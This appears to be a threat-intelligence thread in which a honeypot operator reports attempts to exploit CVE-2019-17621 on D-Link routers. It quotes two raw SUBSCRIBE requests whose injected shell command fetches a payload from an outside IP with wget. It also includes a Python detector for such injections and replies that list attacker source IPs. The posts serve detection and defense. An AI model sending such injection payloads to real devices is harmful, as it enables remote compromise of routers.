Suddenly seeing exploitation attempts of CVE-2019-17621 (D-Link DIR-859 Wi-Fi router RCE). In 3 years of running my Lophiid honeypots, this is the first time I have seen this specific vuln being exploited.

An example request:

SUBSCRIBE /gena.cgi?service=`echo ; wget http://185.93.89.75/81_CAJ0BIC0CCF0BJA_CVE-2019-17621 -O /dev/null; echo >` HTTP/1.1
Host: x.x.x.x
Callback: <http://192.168.0.2:1337/ServiceProxy0>
Connection: close
Nt: upnp:event
Timeout: Second-1800
User-Agent: Mozilla/1.0

#honeypot #dfir #infosec #cybersecurity #threatintel
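The request above is a command injection: the `service` parameter of `gena.cgi` carries a backtick-quoted shell command that fetches a payload. Below is an added example (not code from the original post or from Lophiid) of the kind of check a honeypot or IDS pipeline can run over raw request lines to flag this pattern and pull out the injected command, the payload URL and the CVE tag embedded in the filename. It also accepts `$(...)` substitution, which the post does not show, as a generalization of the same technique; the sample request lines are constructed from the two requests quoted in this thread plus benign traffic.

```python
"""Detect backtick/$(...) command injection in gena.cgi SUBSCRIBE requests.

Added example; not part of the original post or of the Lophiid project.
Parses raw HTTP request lines and reports the injected shell command and
any payload URL it fetches, so the hits can be tagged in a honeypot feed.
"""
import re
from typing import Optional
from urllib.parse import unquote, urlsplit

# Constructed sample input: the two request lines quoted in the thread,
# a benign UPnP SUBSCRIBE with a legitimate service URN, and an unrelated GET.
SAMPLE_REQUESTS = [
    "SUBSCRIBE /gena.cgi?service=`echo ; wget http://185.93.89.75/81_CAJ0BIC0CCF0BJA_CVE-2019-17621 -O /dev/null; echo >` HTTP/1.1",
    "SUBSCRIBE /gena.cgi?service=`echo ; wget http://185.93.89.75/81_DI0EI0A0CDC_CVE-2019-17621 -O /dev/null; echo >` HTTP/1.1",
    "SUBSCRIBE /gena.cgi?service=urn:schemas-upnp-org:service:WANIPConnection:1 HTTP/1.1",
    "GET /index.html HTTP/1.1",
]

# The target may contain raw spaces (the attackers do not URL-encode the
# command), so match greedily up to the trailing " HTTP/x.y".
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>.+) (?P<version>HTTP/\d\.\d)$")
# Shell command substitution: `...` or $(...).
INJECTION = re.compile(r"`(?P<bt>[^`]*)`|\$\((?P<dollar>[^)]*)\)")
URL_IN_CMD = re.compile(r"https?://[^\s;'\"`]+")
CVE_TAG = re.compile(r"CVE-\d{4}-\d{4,}")


def query_params(query: str) -> dict:
    """Split a query string on '&' only; '&' is the one separator we trust.
    parse_qs is avoided because older Pythons also split on ';', which
    would chop the injected command apart."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote(key), unquote(value))
    return params


def analyze(request_line: str) -> Optional[dict]:
    """Return None for non-gena.cgi requests, otherwise a verdict dict."""
    m = REQUEST_LINE.match(request_line.strip())
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/gena.cgi"):
        return None
    service = query_params(parts.query).get("service", "")
    cmds = [g for hit in INJECTION.finditer(service)
            for g in (hit.group("bt"), hit.group("dollar")) if g is not None]
    if not cmds:
        return {"method": m.group("method"), "service": service,
                "injected": False, "command": None,
                "payload_url": None, "cve_tag": None}
    command = cmds[0].strip()
    url_hit = URL_IN_CMD.search(command)
    payload_url = url_hit.group(0) if url_hit else None
    cve_hit = CVE_TAG.search(payload_url or command)
    return {"method": m.group("method"), "service": service,
            "injected": True, "command": command,
            "payload_url": payload_url,
            "cve_tag": cve_hit.group(0) if cve_hit else None}


def scan(request_lines) -> list:
    """Return only the requests that carry an injected command."""
    alerts = []
    for line in request_lines:
        verdict = analyze(line)
        if verdict and verdict["injected"]:
            alerts.append(verdict)
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_REQUESTS):
        print(f"{alert['method']} gena.cgi injection -> {alert['payload_url']} "
              f"(tag {alert['cve_tag']}): {alert['command']}")
```

The payload host and the `_CVE-2019-17621` suffix are taken straight from the quoted requests; the CVE tag is whatever the operator put in the filename, so treat it as an attacker-supplied label rather than a confirmed identification of the exploited bug.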

@heinen we get SUBSCRIBEs in from generic D-Link / TRENDnet gena.cgi Buffer Overflow Attempts all the time

```
${SENSOR_IP}/gena.cgi?service=`echo ; wget http://185.93.89.75/81_DI0EI0A0CDC_CVE-2019-17621 -O /dev/null; echo >`
```

Most of the hits from: 192.159.99.95
A lot from: 185.93.89.75
Tiny amount from: 146.70.117.104

May need to see if @iagox86 thinks that CVE fits this too.

@hrbrmstr @iagox86 interesting!

Interesting! Thanks for sharing.

So I only have 50 honeypots (for personal entertainment) and guess you guys have quite a few more than that :). More importantly, I have them across 6 datacenters which really limits the coverage.

But I'm not complaining: I get more data than I can handle and have fun playing with it (and trying to extract new info in new ways when possible)

@heinen just say the word and you can be in "Spacewar" (a really bad codename for multiplayer greynoise) and get our take on Arkime's UX and all the PCAPs from your nodes. plus our tagging pipeline run on your PCAPs.

would not even require modifying your setup too much.

(fixed the img)